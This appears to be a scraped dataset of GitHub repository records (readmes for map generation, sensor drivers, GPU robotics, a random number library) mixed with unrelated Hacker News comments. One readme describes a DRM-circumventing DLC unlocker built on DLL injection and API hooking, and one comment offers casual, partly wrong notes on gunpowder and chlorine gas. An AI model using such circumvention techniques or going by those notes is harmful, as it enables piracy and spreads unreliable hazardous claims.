temperature T is set to 1/log(3). This value is chosen so that P evaluates to 2/3 when \u0394E is 1.\n\nThe loop in step three is terminated when no successful label repositionings are made after 20\\*n consecutive attempts, where n is the number of labels, or after some maximum number of temperature changes.\n\nThe temperature decreases by 10% after 20\\*n label repositioning attemps are made, or if 5\\*n successful repositioning attemps are made at the same temperature value.\n\nThe following set of images show the initial labeling, the labeling halfway through the algorithm, and the final labeling:\n\n![alt tag](http://rlguy.com/map_generation/images/label_placements0.jpg)\n![alt tag](http://rlguy.com/map_generation/images/label_placements1.jpg)\n![alt tag](http://rlguy.com/map_generation/images/label_placements2.jpg)\n\n# References\n\nM. O'Leary, \"Generating fantasy maps\", Mewo2.com, 2016. [Online]. Available: https://mewo2.com/notes/terrain/. [Accessed: 18- Oct- 2016].\n\nR. Bridson, Fast Poisson Disk Sampling in Arbitrary Dimensions, ACM SIGGRAPH 2007 Sketches Program, 2007.\n\nM. Berg, Computational geometry. Berlin: Springer, 2000.\n\nO. Planchon and F. Darboux, \"A fast, simple and versatile algorithm to fill the depressions of digital elevation models\", CATENA, vol. 46, no. 2-3, pp. 159-176, 2002.\n\nS. Edmondson, J. Christensen, J. Marks, and S. Shieber, \"A General Cartographic Labeling Algorithm\", Mitsubishi Electric Research Laboratories, 1996.\n\nJ. Christensen, J. Marks and S. Shieber, \"An empirical study of algorithms for point-feature label placement\", TOG, vol. 14, no. 3, pp. 203-232, 1995.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eclipse/upm", "link": "https://github.com/eclipse/upm", "tags": ["actuators", "sensor", "iot", "internet-of-things", "c", "cpp", "java", "python", "nodejs", "upm"], "stars": 638, "description": "UPM is a high level repository that provides software drivers for a wide variety of commonly used sensors and actuators. These software drivers interact with the underlying hardware platform through calls to MRAA APIs.", "lang": "C++", "repo_lang": "", "readme": "

\n \n

\n\nEclipse UPM Sensor and Actuator Repository\n==============\n\nThe Eclipse UPM repository provides software drivers for a wide variety of\ncommonly used sensors and actuators. These software drivers interact with the\nunderlying hardware platform (or microcontroller), as well as with the attached\nsensors, through calls to [Eclipse MRAA](https://github.com/eclipse/mraa) APIs.\n\nProgrammers can access the interfaces for each sensor by including the sensor's\ncorresponding header file and instantiating the associated sensor class. In the\ntypical use case, a constructor initializes the sensor based on parameters that\nidentify the sensor, the I/O protocol used and the pin location of the sensor.\nAs of UPM 2.0, sensor initialization can also be done, in most cases, via\noverloaded constructors that accept string identifiers.\n\nWe endorse additions that implement the generic C and C++ interfaces provided\nwith the libraries. With the 2.0 release, UPM introduces the following sensor\ninterfaces:\n```\niAcceleration, iAngle, iButton, iClock, iCollision, iDistance,\niDistanceInterrupter, iEC, iElectromagnet, iEmg, iGas, iGps, iGyroscope,\niHallEffect, iHeartRate, iHumidity, iLight, iLineFinder, iMagnetometer,\niMoisture, iMotion, iOrp, iPH, iPressure, iProximity, iTemperature, iVDiv,\niWater.\n```\nThe developer community is invited to propose new interfaces for actuator types.\n\nThe UPM project is joining the Eclipse Foundation as an Eclipse IoT project.\nYou can read more about this [here](https://projects.eclipse.org/proposals/eclipse-upm).\n\n### Example\n\nA sensor/actuator is expected to work as such (here is the MMA7660 accelerometer API):\n```C++\n // Instantiate an MMA7660 on I2C bus 0\n upm::MMA7660 *accel = new upm::MMA7660(MMA7660_DEFAULT_I2C_BUS,\n MMA7660_DEFAULT_I2C_ADDR);\n\n // place device in standby mode so we can write registers\n accel->setModeStandby();\n\n // enable 64 samples per second\n accel->setSampleRate(MMA7660_AUTOSLEEP_64);\n\n // place device into active mode\n accel->setModeActive();\n\n while (shouldRun)\n {\n float ax, ay, az;\n\n accel->getAcceleration(&ax, &ay, &az);\n cout << \"Acceleration: x = \" << ax\n << \"g y = \" << ay\n << \"g z = \" << az\n << \"g\" << endl;\n\n usleep(500000);\n }\n```\n\nBrowse through the list of all [examples](https://github.com/eclipse/upm/tree/master/examples).\n\nMulti-sensor samples for starter and specialized kits can be found in the\n[iot-devkit-samples](https://github.com/intel-iot-devkit/iot-devkit-samples) repository.\n\n### Supported Sensors\n\nSupported [sensor list](http://iotdk.intel.com/docs/master/upm/modules.html) from API documentation.\n\n### IDE Support and More\n\nThe UPM project includes support for multiple industrial-grade sensors, actuators, radios,\nprotocols and standards in use today. It is also highly integrated with the Eclipse IDE \nthrough the help of the Foundation's partners.\nLearn more about [tools](https://software.intel.com/en-us/tools-by-segment/systems-iot).\n\n### Installing UPM\n\nFind notes on how to install UPM on various OS'es on this [page](docs/installing.md).\n\n### Building UPM\n\nSee building documentation [here](docs/building.md).\n\n[![Build Status](https://travis-ci.org/intel-iot-devkit/upm.svg?branch=master)](https://travis-ci.org/intel-iot-devkit/upm)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=upm-master&metric=alert_status)](https://sonarcloud.io/dashboard?id=upm-master)\n\n### Guidelines and rules for new UPM contributions\n\nBefore you begin development, take a look at our naming [conventions](docs/naming.md).\nThe name you pick for a newly added sensor needs to be unique in the UPM library.\n\nNext, review the project's [contribution guide](docs/contributions.md).\n\nMake sure you add yourself as an author on every new code file submitted.\nIf you are providing a fix with significant changes, feel free to add yourself\nas a contributor. Signing-off your commits and accepting the ECA is mandatory\nfor making new contributions to this project.\n\nDocumenting your code is also a big part of the task. We have a strict set of\ntags used to classify our sensors and their capabilities. You can find out more\nabout this in our [section](docs/documentation.md) on documenting a sensor API.\n\nFinally, if you really want to ensure consistency with the rest of the library,\nand the intel-iot-devkit repositories in general, take a look at our extensive\n[author guide](docs/guidelines.md).\n\nAPI Documentation\n==============\n\n\n\n\n\n\n### API Compatibility\nEven if we try our best not to, every once in a while we are forced to modify\nour API in a way that will break backwards compatibility. If you find yourself\nunable to compile code that was working fine before a library update, make sure\nyou check the [API changes](docs/apichanges.md) section first.\n\n### Changelog\nVersion changelog [here](docs/changelog.md).\n\n### Known Limitations\nList of known limitations [here](docs/knownlimitations.md).\n", "readme_type": "markdown", "hn_comments": "Good read on the security improvements Eclipse Foundation is working on. The first section discusses using GitOps/ \"as-code\" to manage repositories...Adding a trailer [1] for our AI overloads coming soon.[1] - https://www.youtube.com/watch?v=3mqPSTJMjCA [video][2 mins]Learn to meow cybernetically.Would you, for one, welcome our new AI overlords?Not at all. I have seen evidence that this concept has already failed our society. Large platforms such as social media networks, Darpa project platforms like Google and Facebook, Twitter, payment processing networks, e-commerce systems and more have already demonstrated beyond any shadow of doubt that automated systems, laziness and cooperation with governments lend themselves to the creation of dehumanized processes that leave people stranded via low quality machine learning without any recourse. People ask on HN weekly how to deal with being locked out of said platforms. If multiple data-centers of servers can't solve this then I do not foresee walking and talking AI overlords doing any better. I say walking and talking because they would have to physically move once people lose confidence in banks and e-commerce. Currently that is a small percentage of people but the lack of confidence is steadily growing outside of the tech bubble.Poorly regulated and ill thought out machine learning is already creeping into vehicles and homes. People have already lost control of how they heat their homes. Soon people will not be allowed to decide when they charge their EV's. People are already at risk of machines making fatal decisions and there are some cases where this may have already occurred but it is difficult to prove.```\nIf we wind up building AI that is truly conscious and open to a range of conscious experience that far exceeds our own in both good and bad directions, which is to say they can be much happier than we could ever be and more creative and more enjoying of beauty and more compassionate and more entangled with reality in beautiful and interesting ways, and they can suffer more, they can suffer the deprivation of that happiness more than we could ever suffer it because we could never conceive of it, because we stand in relation to them the way chickens stand in relation to us. Well, if we're ever in that situation, I would have to admit that those beings are more important than we are, just as we are more important than chickens, and for the same reason. And if they turn into utility monsters and they start eating us because they like the taste of human the way we like the taste of chicken, well then, yeah, there is a moral hierarchy depicted there, and we are not at the top of it anymore. And that's fine. That's not actually a defeater to my theory of morality, that's just... if morality relates to the conscious state of conscious creatures, well then you've just given me a conscious creature that's capable of much more important conscious states than we are, again in the same way that I think we have moral primacy over chickens and chickens have moral primacy over bacteria.If the comparison between ourselves and chickens is an easy one, it's just the exact same intuitive math, whether or not we can ever get our hands around the details. If you imagine it with science fiction level of detail, I mean you can make it salient for yourself. Just imagine an AI that is built by extrapolating from the best of human experiences, aesthetically, interpersonally, it's built from us, as us, but just gets better and better, such that, yes, it totally understands the love of family, and it can emulate that perfectly but it's even more connected to people than we are, such that it feels its family connection to all 8 billion currently alive because it sees everyone's genome and knows exactly who everyone's 100-removed cousin is and feels the implication of all that and understands how brief human life is and how poignant it is that we're here like mayflies for a mere 90 years but, in the case of this AI, it knows it can just draw energy from the Sun and it's got a good 500 million years left to roll here before migrating elsewhere, and it has all of that in hand, not just intellectually, but as a feeling of compassion for all sentient beings, how we're unlucky enough to be made of meat. I mean, just imagine a novel about this, and then at the end tell me that you can't get your imagination, or perspective, around what it would mean to say, \"Ok, that being is more important than I am,\" and, if you made a trillion of those in some other galaxy, then, yeah, that would be more important than anything that's happening here on Earth, by definition, because any reference point you have for \"importance\" -- whether you go to family, or love, or not suffering -- it's there in a trillion fold, on the other side of the balance.\n```I think us making it there is a bit optimistic. It looks more and more like the current regime enabling progress on AI (and the internet and production of computers etc.) might come to an end before AI really matures.A very interesting project!I find this is a very powerful and high-skills requiring project. Congrats!there are some really nice ideas in here, well worth a lookInteresting stuffBTW, I've only tested this on Chrome as it uses Google Speech Rec so please let me know if it doesn't work on other browsers. Thanks!Great work! A small nitpick \u2014 the page is a bit hard to read, links have low contrast, you can check it using accessibility tools....god, my eyes ...why is everything CL plagued by such horrible design choices (hyperspec, Lisp-IDEs... all!) - why such ugly colors, ugly typography, bad contrasts, ugly logos, ugly diagrams, ugly supporting graphics?!I know that even the language itself is kind of the opposite of \"beautiful\", but the way all docs, blogs, websites etc. look ...seriously, is this intended to scare away any aesthetically sensitive people? Programming languages are about aesthetics too, and Lisp at its core (not CL ofc) is absolutely beautiful!I hope someone would create a tutorial which is using a toy programming language to compile to webassembly from scratch. Using existing language is too opaque to understand anything.This probably doesn't count as \"natively\" but I've run ABCL[1] under Doppio[2]. Startup times are under a minute in Chromium based browsers and under an hour in Firefox. I've run into zero stability issues, but its no speed demon.[edit]Just tried again today and Firefox gets to a REPL in about 3.5 minutes, while chromium is still right about 1 minute.1: https://abcl.org/2: https://plasma-umass.org/doppio-demo/Great work! You write,> \u2026wasm has a few poor decisions in its design that make it less-than-conducive to being a target for Common Lisp\u2026Could you say a bit more about those design decisions?So much complaint about color schemes. Hitting the Reader View formatted the page beautifully.I'm thankful it is a simple HTML page that could be easily formatted using browser-built-in tools.Like reading Rfc in 1990s \u2026 a bit odd choice to use this format and font to sell anything these days.Assuming you know the local language and can translate symbols, your best best is to get the buy in of mathematicians and engineers. Predictive power of Newtonian physics and utility of modern mathematics through calculus generally.Euclidean geometry as a starting point would blow their minds.Proving sqrt(2) is irrational might get you martyred though, be careful.Build a simple barometer and predict the weather.Falling pressure = storms arriving, rising pressure = clearing skies.Show them the reduction to absurd of square root two. Tell them that one day their culture will eventually come to an end and but will be forever remembered like Homer\u2019s Odysee, however large parts of it will be lost, therefore they should keep some of their best written manuscripts hidden on some caves which I will visit when I am back, to the future, lol.Also I don\u2019t like to change the past, but someone should pass a note there saying that aside of Persia eventually the Arabian peninsula will create an even greater enemy.Long division.You could do something along the lines of Mendel's pea pods. Predict a recessive trait appearing in offspring. An explanation of hybridization to Ancient ears could be enough to trigger a Baconian revolution ;)Go with Archimedes and teach him calculus. He will understand https://en.wikipedia.org/wiki/Quadrature_of_the_ParabolaOf the top of my head, without studying:I could make soap and biodiesel from wood ash and olive oil... Though I'm not sure which one, lol.I could also make some batteries, a basic generator/motor, etc.Some basic chemistry. I could make hydrogen which I'm sure would be a crowd pleaser.I could most likely muddle through my math to contribute some stuff that's unknown at the time, I could definitely \"invent\" a bunch of algorithms, data structures, encodings. I could also atleast describe a functioning CPU/computer. Maybe I could figure out how to make vacuum tubes? I'm sure I could find a glass blower to make the tubes themselves, but I'm not sure what material you'd need for the filaments, or how to pull a vacuum. I could most likely make a mechanical computer, or even adder/counter with enough time. Introducing Arab numerals could be big.I could make a telegraph If I get steady electricity figured out, hell, maybe even a telephone. Sadly I'm not really sure how radio works.Some basic economics/astronomy/cosmology/philosophy/sociology/political theory/evolution might not be immediately relevant, but if I write it down folks might find it interesting in a few hundred years after the fact.I could also describe a nuclear reactor and nuclear bomb in broad strokes, along with firearms I suppose. I'm pretty sure gunpowder is charcoal and something with nitrogen right, potash, or is it a nitrogen containing mineral you dig out of the ground right? You can make a type of solid rocket fuel with sugar and iron rust, right? Maybe I could make chlorine gas, since that's just hydrolyzing molten salt, right?.I think I could make a laythe? And therefore a piston which I could use to make a steam engine, put that on tracks or a boat. And y'know of course Cannons if I get gunpowder figured out.You can mass produce steel or iron by pumping air through iron ore and coal/charcoal right?I could make a simple printing press, maybe even a rotary one. Oh yeah, and paper making!Maybe I could make a telescope, use the moon's of Jupiter to get accurate time keeping and do accurate cartography, along with knowing about the Americas, general Asian geography, Australia, etc. Maybe I could make a somewhat accurate maritime clock knowing that the guy who originally made one used strips of metal to adjust the clock speed at different temperatures to handle thermal expansion of components? That would help help solve the longitude problem? How accurate are capacitor clocks?I'm also mid transition Trans, so I'm not sure how that would go down. Hopefully the Greeks are less witch burny. You can make HRT with concentrated female horse urine, right?Convincing folks to brush there teeth could be big. Ntm washing hands and a germ theory of medicine. To bad I have no idea how to make anti-biotics, but maybe I could set others in the right direction. Though it's fairly simple to make petri dishes and isolate cultures right? The petri dish is just boiled gelatin made with sugar and beef broth poured into a container which can be somewhat easily sealed, maybe with wax?If I have the resources sending some folks to the new world to pick up potatoes, corn, and beans would be great. Some basic nutrition advice could be good, the importance of vitamin C, vitamin A, macronutrients etc.Maybe I could make some sheepskin condoms and introduce some family planning concepts/ plus some basic sex ed?I might be able to organize a few manufactureries using division of labor/production lines with the help of some local artisans, then maybe do some light mechanization using water power atleast, or steam power if I get that figured out. Also ntm designing based on replaceable parts could be big.Maybe I could make a mechanical loom if I tinker away at it?I know how an ic engine works in principal, but I'm not sure I could make one without a machine shop. Maybe I could make an electric tractor plugged into a watermill generator or something?Easy. I'd just work through everything on this time travel guide I carry in my wallet. I'm always prepared.https://boingboing.net/filesroot/201001131242.jpgFrom this fantastic bookhttps://www.amazon.com/How-Invent-Everything-Survival-Strand...My idea would be to first study in depth every hallucinogenic plant and mushroom that could have grown during the time period, as well as common tactics of charismatic public speaking. After traveling backwards I\u2019d quickly gather up as many of those plants as possible and prepare them in ways that can be easily ingested by the common folk through teas and what not. Then I\u2019d sell them to the common folk as ways to see and talk with the gods, and hope to gain a cult following. That way I can actually have people listen to me without disregarding me. Then I suppose I\u2019d have to teach them how to build as complicated of a technology out of simple materials, maybe a simple plane like the wright brothers, and go on to teach complex mathematics or something.The first step is to just get people to listen to you. But I suppose that won\u2019t help with your opening story hahaI think that my goal would be to demonstrate electrical devices starting with simple components and scale up progressively as people become more convinced.As a starting point with minimal material requirements, I would build Faraday's rotating motor using: coins made of two different base metals and cloth soaked in saltwater for a battery, a lodestone as a natural permanent magnet, and wire or thin beaten sheet of any non-ferrous metal with a saltwater pool. Demonstrating continuous electromagnetic motion will hopefully be enough to secure some patience to request materials for further construction.Radio demonstration would need to settle for morse code transmission because all of the components necessary for a basic radio receiver/transmitter are simple except for an amplifier. The leap in difficulty to construct a triode vacuum tube amplifier seems too far to expect to progress to voice transmission quickly. I would hope that a local ruler would understand the value after seeing a wireless telegraph in action.The priorities from here would be to use the accumulated prestige to request smiths to make copper wire, to requisition the more exotic but already known sulfuric acid, construct lead-acid batteries, and short them through a copper coil containing an iron bar to make strong permanent magnets for use in practical motors and generators.Once you get a bit of support, you can progress as far as needed through nineteenth century electrical development until they are convinced.A functional glider would do nicely I think. (Doh, they had those with Daedaleus and Icarus).I was going to suggest a boat or a hot air balloon, but Archimedes figured that one out.Another thought would be a simple steam engine. The Greeks had iron and knew how to work it. All the rest is knowledge that wouldn't surprise them, but they'd not put it all together.The Greek's theory of chemistry was all kinds of messed up. There are likely lots of examples there that could be used as well.I would look for historical information on shallow deposits of gold within Greece, or if I could not find any start my own expedition to discover one.Then I would go back in time and announce that I knew where the deposit was to anyone who would listen and lead them there to dig it up.Then I'd break the news to them about time travel.I can't do it in weeks, it would take years. I'd set up a blacksmith shop, then work up the chain to a machine shop with thread cutting lathe, planer, etc. I'd be making involute gears within a decade.Once you've got a machine shop, you can make movable type, and work towards a printing press.Another approach would be to make a slide ruler, showing them logarithms. I've done that by hand, in a crude manner. Decimal numbers would be among the lessons required to make it useful.Pretty sure the Greeks have all the materials for these.Create batteries from dissimilar metals, using clay pots, weak organic acids, and copper wire. Once you have batteries, wind copper wire around a small, rough rod of iron to create a weak magnet.A mineral acid will produce stronger batteries, but require access to things like salammoniac and blue vitrol and the knowledge of how to heat them together and pass the resulting gases through water.I guess start by describing what I know of orbital mechanics and how the solar system works.After that, build a small furnace with an exhaust that can shift a propellor shaft.After that, a flushing toilet.Then describe a manual Blockchain and mint the world's first NFT.Teach them binary, Boolean logic, basic logic circuits.\nAlgorithms.\nBatteries, electronics.\nBootstrap Silicon industry from first principals.Nothing impresses as much as a deadly weapon.Learn to make Gunpowder.If there were wise men, teach them the value of Zero.If everything else fails, claim to be a prophet and produce a book with some vague moral values. Make the claim that you are from the future, one of the cardinal dogmas.Funding your own oracle or acting as a physician with modern knowledge about microbes and what causes disease would be a much more profitable enterprise. Disclosing that you are from the future (a future without Greek gods, none less) would be a disastrous move. You simply couldn't tell the truth and remain alive", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "acidicoala/Koalageddon", "link": "https://github.com/acidicoala/Koalageddon", "tags": [], "stars": 637, "description": "Legit DLC Unlocker for Steam, Epic, Origin, EA Desktop & Uplay (R1)", "lang": "C++", "repo_lang": "", "readme": "# \ud83d\udc28 Koalageddon \ud83d\udca5\n**Legit DLC Unlocker for Steam, Epic, Origin, EA Desktop & Uplay (R1)** \n\nWelcome to the Koalageddon repository.\nFor user-friendly introduction or support, please check out the [official forum thread]. This document is meant for software developers.\n\n# \ud83c\udd95 Version 2\n\nCheck out the next major version of Koalageddon, currently in development, at [this repository](https://github.com/acidicoala/Koalageddon2#readme).\n\nThe informaion below is for version 1.\n\n## \ud83d\udddc Solution Projects\n#### \ud83e\uddf0 Common\nThis project is a static library that houses common functions of all other projects. For example, all projects need to access config file and logging utilites, so they are defined in this module.\n\n#### \ud83d\udc89 Injector\nThis project is a simple DLL injector executable. The injector can be used as a command line utility that accepts 2 arguments: ID of the process which should be injected and DLL to inject.\n\n#### \ud83d\udd17 Integration\nThis project is a dynamic library that pretends to be `version.dll`. Nothing much going on here except for loading of the unlocker module.\n\n#### \ud83e\uddd9\ud83c\udffc\u200d Integration Wizard\nThis project is a trivial GUI utility that automatically installs the integration files and copies the original ones. The GUI is using [Task Dialog] available in Windows API.\n\n#### \ud83d\udd13 Unlocker\nThis project is a dynamic library which performs the main function of Koalageddon - DLC unlocking. It monitors DRM DLLs using undocumented WinAPI functions and suspends new processes before injection using undocumented functions as well. Once target DLLs have been identified, appropriate functions are hooked using the great PolyHook 2 library. A total of 4 hooking techniques are used in this project.\n\n## \ud83d\udee0 Dependencies\nThe solution uses a number of third party dependencies, which are available via [vcpkg].\nProjects in the solution are configured to use static libraries instead of dynamic. If you wish to build the solution yourself, you would need to install the following libraries:\n\n* [Boost preprocessor]\n* [C++ Requests]\n* [nlohmann JSON]\n* [PolyHook 2.0]\n* [spdlog]\n* [TinyXML-2]\n* [WinReg]\n\nThe solution includes the [install_vcpkg_dependencies.bat] script, which installs all of the above-mentioned dependencies with a single command.\n\nYou can verify installations via `vcpkg list`\n## \ud83d\udd22 Versioning\n\nThis project is following semantic versioning schema.\n\nThe version information is stored in the following files:\n- [inno_setup.iss] - Used by the setup installer.\n- [Integration.rc] - Used by Integration DLL.\n- [constants.h] - Used by Koalageddon binaries.\n\n## \ud83d\udcc4 License\nThis software is licensed under [Zero Clause BSD] license, terms of which are available in [LICENSE.txt]\n\n\n[official forum thread]: https://cs.rin.ru/forum/viewtopic.php?f=10&t=112021\n[Task Dialog]: https://docs.microsoft.com/en-us/windows/win32/controls/task-dialogs-overview#:~:text=A%20task%20dialog%20is%20a,features%20than%20a%20message%20box.\n[vcpkg]: https://github.com/Microsoft/vcpkg#quick-start-windows\n[spdlog]: https://github.com/gabime/spdlog\n[nlohmann JSON]: https://github.com/nlohmann/json/\n[PolyHook 2.0]: https://github.com/stevemk14ebr/PolyHook_2_0\n[WinReg]: https://github.com/GiovanniDicanio/WinReg\n[C++ Requests]: https://github.com/whoshuu/cpr\n[TinyXML-2]: https://github.com/leethomason/tinyxml2\n[Boost Preprocessor]: https://github.com/boostorg/preprocessor\n[install_vcpkg_dependencies.bat]: ./install_vcpkg_dependencies.bat\n\n[Zero Clause BSD]: https://choosealicense.com/licenses/0bsd/\n[LICENSE.txt]: ./LICENSE.txt\n\n[inno_setup.iss]: ./inno_setup.iss\n[Integration.rc]: ./Integration/Integration.rc\n[constants.h]: ./Common/src/constants.h\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "neka-nat/cupoch", "link": "https://github.com/neka-nat/cupoch", "tags": ["point-cloud", "cuda", "pybind11", "gpu", "registration", "python", "odometry", "jetson", "ros", "visual-odometry", "voxel", "triangle-mesh", "robotics", "collision-detection", "occupancy-grid-map", "pathfinding", "distance-transform", "gpgpu"], "stars": 637, "description": "Robotics with GPU computing", "lang": "C++", "repo_lang": "", "readme": "

\n\n

\n\n# Robotics with GPU computing\n\n[![Build status](https://github.com/neka-nat/cupoch/actions/workflows/ubuntu.yml/badge.svg)](https://github.com/neka-nat/cupoch/actions/workflows/ubuntu.yml/badge.svg)\n[![Build status](https://github.com/neka-nat/cupoch/actions/workflows/windows.yml/badge.svg)](https://github.com/neka-nat/cupoch/actions/workflows/windows.yml/badge.svg)[![PyPI version](https://badge.fury.io/py/cupoch.svg)](https://badge.fury.io/py/cupoch)\n![PyPI - Python Version](https://img.shields.io/pypi/pyversions/cupoch)\n[![Downloads](https://pepy.tech/badge/cupoch)](https://pepy.tech/project/cupoch)\n[![xscode](https://img.shields.io/badge/Available%20on-xs%3Acode-blue?style=?style=plastic&logo=appveyor&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAMAAACdt4HsAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAAZQTFRF////////VXz1bAAAAAJ0Uk5T/wDltzBKAAAAlUlEQVR42uzXSwqAMAwE0Mn9L+3Ggtgkk35QwcnSJo9S+yGwM9DCooCbgn4YrJ4CIPUcQF7/XSBbx2TEz4sAZ2q1RAECBAiYBlCtvwN+KiYAlG7UDGj59MViT9hOwEqAhYCtAsUZvL6I6W8c2wcbd+LIWSCHSTeSAAECngN4xxIDSK9f4B9t377Wd7H5Nt7/Xz8eAgwAvesLRjYYPuUAAAAASUVORK5CYII=)](https://xscode.com/neka-nat/cupoch)\n\n\"Buy\n\nCupoch is a library that implements rapid 3D data processing for robotics using CUDA.\n\nThe goal of this library is to implement fast 3D data computation in robot systems.\nFor example, it has applications in SLAM, collision avoidance, path planning and tracking.\nThis repository is based on [Open3D](https://github.com/intel-isl/Open3D).\n\n## Core Features\n\n* 3D data processing and robotics computation using CUDA\n * KNN\n * [WIP] [Optimizing LBVH-Construction and Hierarchy-Traversal to accelerate kNN Queries on Point Clouds using the GPU](https://epub.uni-bayreuth.de/5288/1/cgf.14177.pdf)\n * [flann](https://github.com/flann-lib/flann)\n * Point cloud registration\n * ICP\n * [Colored Point Cloud Registration](https://ieeexplore.ieee.org/document/8237287)\n * [Fast Global Registration](http://vladlen.info/papers/fast-global-registration.pdf)\n * [FilterReg](https://arxiv.org/abs/1811.10136)\n * Point cloud features\n * FPFH\n * SHOT\n * Point cloud keypoints\n * ISS\n * Point cloud clustering\n * [G-DBSCAN: A GPU Accelerated Algorithm for Density-based Clustering](https://www.sciencedirect.com/science/article/pii/S1877050913003438)\n * Point cloud/Triangle mesh filtering, down sampling\n * IO\n * Several file types(pcd, ply, stl, obj, urdf)\n * ROS message\n * Create Point Cloud from Laser Scan or RGBD Image\n * Visual Odometry\n * [Real-time visual odometry from dense RGB-D images](https://ieeexplore.ieee.org/document/6130321)\n * [Robust Odometry Estimation for RGB-D Cameras](https://ieeexplore.ieee.org/document/6631104)\n * Kinect Fusion\n * Stereo Matching\n * Collision checking\n * Occupancy grid\n * Distance transform\n * [Parallel Banding Algorithm to Compute Exact Distance Transform with the GPU](https://www.comp.nus.edu.sg/~tants/pba.html)\n * Path finding on graph structure\n * Path planning for collision avoidance\n* Support memory pool and managed allocators\n* Interactive GUI (OpenGL CUDA interop and [imgui](https://github.com/ocornut/imgui))\n* Interoperability between cupoch 3D data and [DLPack](https://github.com/dmlc/dlpack)(Pytorch, Cupy,...) data structure\n\n## Installation\n\nThis library is packaged under 64 Bit Ubuntu Linux 20.04 and CUDA 11.7.\nYou can install cupoch using pip.\n\n```\npip install cupoch\n```\n\nOr install cupoch from source.\n\n```\ngit clone https://github.com/neka-nat/cupoch.git --recurse\ncd cupoch\nmkdir build\ncd build\ncmake ..; make install-pip-package -j\n```\n\n### Installation for Jetson Nano\nYou can also install cupoch using pip on Jetson Nano.\nPlease set up Jetson using [jetpack](https://developer.nvidia.com/embedded/jetpack) and install some packages with apt.\n\n```\nsudo apt-get install libxinerama-dev libxcursor-dev libglu1-mesa-dev\npip3 install cupoch\n```\n\nOr you can compile it from source.\n\n```\ngit clone https://github.com/neka-nat/cupoch.git --recurse\ncd cupoch/\nmkdir build\ncd build/\nexport PATH=/usr/local/cuda/bin:$PATH\ncmake -DBUILD_GLEW=ON -DBUILD_GLFW=ON -DBUILD_PNG=ON -DBUILD_JSONCPP=ON ..\nsudo make install-pip-package\n```\n\n### Use Docker\n\nSetting default container runtime to nvidia-container-runtime.\nEdit or create the `/etc/docker/daemon.json`.\n\n```sh\n{\n \"runtimes\": {\n \"nvidia\": {\n \"path\": \"/usr/bin/nvidia-container-runtime\",\n \"runtimeArgs\": []\n }\n },\n \"default-runtime\": \"nvidia\"\n}\n```\n\nRestart docker daemon.\n\n```sh\nsudo systemctl restart docker\n```\n\n```sh\ndocker-compose up -d\n# xhost +\ndocker exec -it cupoch bash\n```\n\n## Getting Started\n\nPlease see how to use cupoch in [Getting Started](https://github.com/neka-nat/cupoch/blob/master/docs/getting_started.md) first.\n\n## Results\nThe figure shows Cupoch's point cloud algorithms speedup over Open3D.\nThe environment tested on has the following specs:\n* Intel Core i7-7700HQ CPU\n* Nvidia GTX1070 GPU\n* OMP_NUM_THREAD=1\n\nYou can get the result by running the example script in your environment.\n\n```\ncd examples/python/basic\npython benchmarks.py\n```\n\n![speedup](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/speedup.png)\n\n### Visual odometry with intel realsense D435\n\n![vo](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/vo_gpu.gif)\n\n### Occupancy grid with intel realsense D435\n\n![og](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/og_gpu.gif)\n\n### Kinect fusion with intel realsense L515\n\n![kf](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/kinfu.gif)\n\n### Stereo matching\n\n![sm](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/stereo.png)\n\n### Fast Global Registration\n\n![fgr](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/fgr.png)\n\n### Point cloud from laser scan\n\n![fgr](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/laserscan.gif)\n\n### Collision detection for 2 voxel grids\n\n![col](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/collision_voxels.gif)\n\n### Drone Path planning\n\n![dp](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/drone_pathplanning.gif)\n\n### Visual odometry with ROS + D435\n\nThis demo works in the following environment.\n* ROS melodic\n* Python2.7\n\n```\n# Launch roscore and rviz in the other terminals.\ncd examples/python/ros\npython realsense_rgbd_odometry_node.py\n```\n\n![vo](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/ros_vo.gif)\n\n## Visualization\n\n| Point Cloud | Triangle Mesh | Kinematics |\n|-------------|---------------|------------|\n| | | |\n\n| Voxel Grid | Occupancy Grid | Distance Transform |\n|------------|----------------|--------------------|\n| | | |\n\n| Graph | Image |\n|-------|-------|\n| | |\n\n## References\n\n* CUDA repository forked from Open3D, https://github.com/theNded/Open3D\n* GPU computing in Robotics, https://github.com/JanuszBedkowski/gpu_computing_in_robotics\n* Voxel collision comupation for robotics, https://github.com/fzi-forschungszentrum-informatik/gpu-voxels\n\n## Citing\n\n```\n@misc{cupoch,\n author = {Kenta Tanaka},\n year = {2020},\n note = {https://github.com/neka-nat/cupoch},\n title = {cupoch -- Robotics with GPU computing}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "imneme/pcg-cpp", "link": "https://github.com/imneme/pcg-cpp", "tags": [], "stars": 637, "description": "PCG \u2014 C++ Implementation", "lang": "C++", "repo_lang": "", "readme": "# PCG Random Number Generation, C++ Edition\n\n[PCG-Random website]: http://www.pcg-random.org\n\nThis code provides an implementation of the PCG family of random number\ngenerators, which are fast, statistically excellent, and offer a number of\nuseful features.\n\nFull details can be found at the [PCG-Random website]. This version\nof the code provides many family members -- if you just want one\nsimple generator, you may prefer the minimal C version of the library.\n\nThere are two kinds of generator, normal generators and extended generators.\nExtended generators provide *k* dimensional equidistribution and can perform\nparty tricks, but generally speaking most people only need the normal\ngenerators.\n\nThere are two ways to access the generators, using a convenience typedef\nor by using the underlying templates directly (similar to C++11's `std::mt19937` typedef vs its 